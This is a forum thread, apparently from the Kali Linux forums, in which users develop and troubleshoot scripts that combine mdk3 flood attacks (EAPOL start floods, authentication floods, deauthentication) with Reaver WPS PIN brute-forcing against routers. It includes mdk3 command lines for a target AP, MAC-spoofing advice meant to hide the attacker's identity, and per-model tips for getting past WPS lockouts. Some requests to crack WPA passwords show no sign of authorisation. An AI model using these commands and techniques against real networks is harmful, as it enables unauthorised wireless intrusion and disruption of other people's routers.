hello hello friends thank you so much soxrok2212 you are great guy i am so grateful for your help
hello hello friends thank you so much soxrok2212 you are great guy i am so grateful for your help
Wow, I never expected to see this thread reach 50,000 views. I guess its pretty popular. I'm very doubtful here, but is there anyone who knows how to make a full GUI with all the methods posted by various users here? It would include options of:
1.) mac changing after a specified number of pin trials
2.) reaver incorporated, of course ;D
3.) MDK3 auth flodd
4.) beacon flood
5.) MIC failure
6.) deauth
7.) EAPOL failure
More??
It would just be nice to have a full GUI for EVERYTHING posted by users here... plus having a few terminal windows open and typing in the commands every time is a bit annoying. I'm not talking a script here, a full blown GUI.
I'm doubtful but the community here is pretty big. And maybe, just maybe we could get it pushed to be a standard tool in Kali!
Musket Teams wish to note that there are no mac address spoofing routines written into ReVdK3. Users will be broadcasting using their hardware installed mac address. We have no comment on the program itself as until we write these routines into the script we will only do cursory tests.
Please note i have written the little script ReVdK3 for free distribution and to contribute worthily to kali linux forum and mdk3 team,
it is COMMON COURTESY for any team or individual that wants to improve this script, request my consent or create the script with a
with an invented name of their own. This is because improvement of this script is set aside by me in the near future....thank you...
A Peer Review of ReVdK3
This thread will not discuss the ability of Revdk3 to actually reset a router.
Musket Teams have been working with soxrox2212 since this mdk3 approach to reset routers remotely was conceived.The current ReVdK3 approach by repzeroworld is novel, hence once we got a copy of the program we tested it in our lab.
This program tries to run three(3) mdk3 attacks from a single terminal window process using $MON1, $MON2 and $MON3(ie mon0,mon1,mon2). We have tested the stock ReVdK3 and find no indiction that $MON2 and $MON3 are functioning.
When running ReVdk3 against the targetAP, Airodump-ng clearly shows only one(1) mdk3 process running.
To prove these processes were not masking themselves one over the other.
We ran the three(3) processes in separate terminal windows, first manually, then in Eterm and Xterm windows. Airodump-ng clearly shows all three(3) processes functioning when run from separate terminal windows, and only one(1) process when running RevdK3.
To further prove this we gave each monitor ie $MON1, $MON2, $MON3 an individual mac address. When running the three(3) mdk3 attacks from Eterm windows embedded in the reVdk3 program these different mac addresses were expressed in the Eterm window AND airodump-ng showed data transference from these three(3) monitor/mac address pairs. When we ran the stock ReVdk3 only a single process running $MON1 was seen.
We believe the authors original approach using three(3) terminal windows was the correct one.
If you want to run three(3) separate processes off the physical device $WLAN from a bash script you need to run Eterm or Xterm windows, one(1) for each process.
As the author has expressed a desire to view other work on the subject, a copy of a possible Eterm window solution starting at line 438 in the stock program can be seen below:
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
Eterm -g 80x10-1-400 --cmod "red" -T "Packet Flood $MON1" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON1 x 0 -t $MAC -n $ESSID -s 100; bash" &
sleep 2
Eterm -g 80x10-1-250 --cmod "red" -T "Packet Flood $MON2" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON2 x 0 -t $MAC -n $ESSID -s 100; bash" &
sleep 2
Eterm -g 80x10-1-70 --cmod "red" -T "Packet Flood $MON3" -e sh -c "timeout $TIMEOUT_OPTION_FOR_EAPOL_START_FLOOD mdk3 $MON3 x 0 -t $MAC -n $ESSID -s 100; bash" &
sleep 2
fi
killall -q Eterm &> /dev/null
MTA and MTD
Last edited by mmusket33; 2014-05-06 at 06:14.
When ReVdK3 was distributed, the script was shortly revised afterwards to correct this problem using a tricky method and was given to my acquintances who williingly volunteer to test.. for a second reminder see below.
"Please note i have written the little script ReVdK3 for free distribution and to contribute worthily to kali linux forum and mdk3 team,
it is COMMON COURTESY for any team or individual that wants to improve this script, request my consent or create the script with a
with an invented name of their own. This is because improvement of this script is set aside by me in the near future....thank you... "
ReVdK3 had some issues that I wasn't aware of when it was shortly distributed.
I became aware of these bugs when viewers tested the script and provided me with their feedback....
Thank you to those people who provide their feedback that helped me trace where the problems were...
Some of the problems were as follows:
1. whenever the script ran and was terminated, bash left mdk3 running in the background the "while ; do loop problem". if the script was restarted
this resulted in duplication of many mdk3 processes which affected not only the mdk3 attack but also reaver and the monitor interfaces
- this issue was fixed by killing all mdk3 process after running and looping again.
2. the first distributed script ran the mdk3 eapol start flood attack in one terminal!(the script was functioning but it was how bash was interpreting the instructions)...now all three eapol start attack will run in three little terminals!- issue fixed using gnome-terminal command
3. I increased the number of packets injected for eapol attacks to helped to reboot one of the access point that took long to reboot/ unlock (WPS).
4. I added instructions to the script to change your mac address of monitor and wireless interfaces..this is to help hide your identity
the old script was taken off of the torrent link. the link for the new script is below:
http://www.legittorrents.info/index....&page=torrents
NOTE:
MDK3 WILL NOT RESET ALL ROUTERS BASED ON FEEDBACK BUT IS VERY USEFUL. As a result, the revised script can be downloaded
from the link stated.
Last edited by repzeroworld; 2014-05-10 at 13:32.
If anyone is having trouble in reaver associating to an AP, make sure your wireless card supports wireless N because the target AP may be in N only mode.
soxrok2212
Could you recommend a few wifi adapters supporting N that work with Kali. From a sources of supply perspective could you recommend more then one.
MTA
I just purchased an Alfa AWUS051NH on eBay for about $35. It should be delivered within a couple of days and I'll report back after some testing. It's a dual band 150/300mbps card so I should see some speed increases over my AWUS036H, and based on some reviews, it looks pretty promising.
Got my hands on an Alfa AWUS051NH and I love it. Rt2800 drivers, injection works, and I definitely prefer it over my AWUS036H because the PWR levels in airodump-ng are much more accurate (I don't think its as powerful though...) I haven't extensively tested injection rates yet but it seems very promising. Excellent range too and only about $33 on eBay.
Last edited by soxrok2212; 2014-05-30 at 01:41.
Have you tried boosting the power levels. The routine we use to avoid the negative one issue also boosts an RTL8187 to 30dBm. See our thread Simple Solution to negative one issue. You can download the routines there or we can post them or send them to you if you wish.
MTA
Musket Teams have been working on a different approach to WPS locked routers. Instead of attempting to reset a WPS locked router, we attempted to prevent router WPS locking. Targets were routers known to lock the WPS system after X number of pin requests. We flooded the router with various combinations of mdk3 attacks while simultaneously conducting a reaver attack.
To date we have had little success! However for those writing reset router programs note the following.
Reaver was always able to harvest pins while the router was being subjected to various combined mdk3 attacks. Hence there is no reason to start and stop reaver. You can leave it running in the background. If the router locks, no pins will be collected, if the router resets pins will again be harvested even though multiple mdk3 attacks are assaulting the targetAP.
So basically if you run mdk3 concurrently with reaver it will never lock out?
No we are not saying that.
We have seen the following against routers in our areas of operation.
If your target is a router which the WPS systerm is open BUT will lock after x number of pin attempts then:
1. If you run combinations of mdk3 against the router AND you run reaver at the same time, reaver will continue to collect pins until the router locks. The mdk3 attacks do not disrupt the collection of pins. We have seen routers freeze but no reset and then continue which is congruent with reaver collecting pins. What is important here is that you can run your mdk3 attack(s) and your reaver attack at the same time. Should the router reset reaver will begin collecting pins again until the router locks even though mdk3 is attacking the router. You do not have to run the mdk3 attack then stop the attack and run reaver and then stop reaver and run the mdk3 attack again. Just run both and walk away.
The only problem here is that router when reset might jump channels.
For historical reference we had approx 10 target router which were open. We ran mdk3-reaver attacks at the same time and locked all the routers.
MTA
Gotcha, so its a bit more time efficient.
Hi guys. Can you please modify your script for me so that it starts Reaver with -L (Ignore lock) option and then does 10 attempts and stops, after that start only mdk3 (mdk3 a -a bssid -m) for another 40 secs and stop mdk3 and then resume Reaver with -L (ignore lock) option again and loop like this until WPS is found. Thanks alot waiting your reply. ( and please with only 1 monitor interface)
hello..i got your message...hectic working schedule these days...i will modify the script for your taste and send it...send me a private message with your email adds on my channel or kali.....i have finished working on a revision of the script..ReVdK3-r1.sh (revision 1)
Some of the features of this revised script:
1. Whenever 25 successive eapol failures is detected, the script will flood the AP for the specified time you choose (eapol start failures are caused by a variety of factors, but i decided to add this feature just to force unresponsive Access Point to overload itself and do a FRESH reboot.)
2. The script runs aireplay-ng and reaver in ONE terminal..it switches periodically between the two processes without terminating either of them.not SNAPSHOTS of reaver and mdk3.....also it keeps re-running aireplay in the event that it quits because of "no beacon frames" or other reasons....i found that aireplay significantly add persistence to the association process despite reaver can associate by itself.
3. Good House keeping- the script will automatically remove temporary files associated with the script and ensure all processes are killed prior to a SINGLE (1) SIGINT (Ctrl C) or SIGHUP signal (closing the terminal).
4. introduce the -S flag in the reaver command line to speed up cracking...
5. a couple of minor bug fixes
hmm.....One cold beer to "N1Ksan" who "push" me to do a revision and contributed some of the ideas above..not forgetting how many unstable versions of script i sent him to test........
Hey man, I sent you private message here in Kali, please send it to my email.
I found out that many TP-link router models whose MAC address start with "10-FE-ED" can be used MDK3 (mdk3 a -a bssid -m) for 30 seconds and then it will let you continue reaver for 10 attempts and then do the same thing again and again. But the issue is that WPS will show Locked as Yes even after mdk3 but will let you continue with ignore option -L . Your previous scipts I tried didn't reset those Tplink routers not even let me continue with Ignore lock option.
Best of luck and thanks again, will test it for you if you have other scripts.
Hey friends, i want to test your scripts. Im trying to crack wpa passwords but i fail in all tries. I need some help, some information about this you are working. Send me message plz. ps: sry for my english
o think i must say , that one of my wifi cards have broken itself using all the mdk# codes at same time pointing to a specific AP , and it was at its max power .
resuming , card was not able to transmit again
We'll if you set it to max power you probably fried it...
RELEASE OF REVDK3-R1.sh
DOWNLOAD LINK
http://www32.zippyshare.com/v/12811261/file.html
----------------------------------------
ReVdK3-r1.sh (Revision 1 README Section |
---------------------------------------------------------------------------------------------
WARNING: |
Do not use this script without permission from the victim to carry out the specified attacks. |
|
This is the first offical revision of ReVdK3.sh script |
----------------------------------------------------------------------------------------------
Script features in this revision
1. Runs reaver,aireplay-ng in one terminal and detects continously when reaver is rate limiting pins.
After input of wireless adapter interface..it checks to see if there are any monitor interfaces on that adapter interface. Any existing monitor interfaces are wiped out and three new monitor interfaces are created. The script also uses these interface during the attacking process. In the event that aireplay times out because association issues or switches to "shared key open authentication", the script will re-run aireplay-ng.
2. Runs mdk3 attacks until reaver detects that the WPS state of the AP has been unlocked. Once WPS has been unlocked it kills all mdk3 attacks and waits until reaver detects WPS has been locked again..this process goes on...
3. Upon detection of 25 successive EAPOL start failures, the script floods the AP for 60 second to see if the AP will do a fresh reboot!
4. Killing the script in a terminal will trigger it to remove all tmp files, force all processes started by the script to terminate and wiping out the three monitor interfaces it created..be patient about 1-2 seconds for termination of the script...Also you call close the terminal instead of killing this will send a hang up signal to do the necessary cleaning up..
Last edited by repzeroworld; 2014-06-17 at 03:02. Reason: to change download link
thanks for the thumbs up....having issues with the link too
but i did manage to upload it on zippyshare
the link is below (do tell me if it works):
http://www32.zippyshare.com/v/12811261/file.html
if the file is supposed to be 26.2 kB (26,158 bytes) in size, then yes it works.
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Awesome job with ReVdK3-r1.sh.
I was able to use it to crack my Belkin N+ router when the Reaver Pro couldnt attempt not one pin.
I posted a demonstration here for anyone interested:
EDIT: Youtube vids not allowed.
I think you could make the script better by including check for gnome-terminal and apt-get install gnome-terminal for us XFCE fans.
Also, if the script connected to WPS protected AP as soon as it found the pin would be cool too. (have itsend an email when done)
Regards,
Last edited by sickn3ss; 2014-07-06 at 13:20.
*Post Deleted* Wrong thread, moved to Belkin Mac Address/SSID Correlation.
Last edited by soxrok2212; 2014-07-03 at 16:34.
Very interesting...
Last edited by bolexxx; 2014-07-06 at 13:27.
@ xiajapan You get that error because you are probably trying to run the script from a terminal program other than gnome-terminal.
Downloads for useful programs: I will do my best to keep these updated
Atrophy
ReVdk3-r1
FrankenScript 2[/QUOTE]
Hey can anyone give me a hint of what this little trio is about please? thank you very much and have a nice day.
@soxrok2212
REVDK3-R1.sh seemed to work well for one router, but I've tried on another and I seem to be stuck at trying the same pin over and over again. I've even bumped to -t 40
This loops.Received M1
Sending M2
Received M1
Received WSC NACK
Sending WSC NACK
WPS transaction failed code: 0x04), re-trying last pin
...
Running Reaver by itself and tweaking the settings gives just about the same results. Any other ways to see what's going on?
Last edited by gismo; 2014-07-10 at 23:48.
Well, I can open the script .. more when I run the message appears every time ..
WARNING [!]: Detected AP rate limiting, waiting 10 seconds before re-checking
WARNING [!]: Detected AP rate limiting, waiting 10 seconds before re-checking
WARNING [!]: Detected AP rate limiting, waiting 10 seconds before re-checking
What can I do to continue the attack?
Atrophy is a basic program that uses MDK3 to attempt to reboot routers (helpful when trying to unlock WPS.) The program uses Authentication flood, Michael Integrity Check failure, beacon flood, and deauthentication (a few others too depending on your configuration.)
ReVdk3 is a similar program to Atrophy, but it uses a different approach to attack an access point. It uses EAPOL start and stop attacks to attempt to reboot the router.
Frankenscript 2 is a full blown program that offers a wide range of tools to attack access points. You can find more info here.
@OE 800, thanks for your answer. I am using xiaopan OS in virtual box so I dont really know what terminal I am using... I tried to install gnome terminal by using the command sudo apt-get install gnome-terminal but I got the message that apt-get command is not found...
There is a very very small chance that reaver has incorrectly reported that the WPS is locked. Test this by putting a -L in the reaver command line. If the warning remains you can attempt to reset the router remotely by one of the reset router programs. Otherwise wait till the router unlocks or collect a handshake and try brute forcing the handshake, or go WPA phishing and/or look for other targets.
MTB
i cannot restart the wps locked status on 2 rooters with the attacks
like nothing is happening
the router automatically unlocks after a day or two
This is a Kali-Linux support forum, not a general infosec/"hacking" forum.
As a result, this thread has been locked due to it not being related to the nature of the forum.
This is a Kali-Linux support forum - not general IT/infosec help.
Useful Commands: OS, Networking, Hardware, Wi-Fi
Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
Hardware: Recommended 802.11 Wireless Cards
Documentation: http://docs.kali.org/ (Offline PDF version)
Bugs Reporting & Tool Requests: https://bugs.kali.org/
Kali Tool List, Versions & Man Pages: https://tools.kali.org/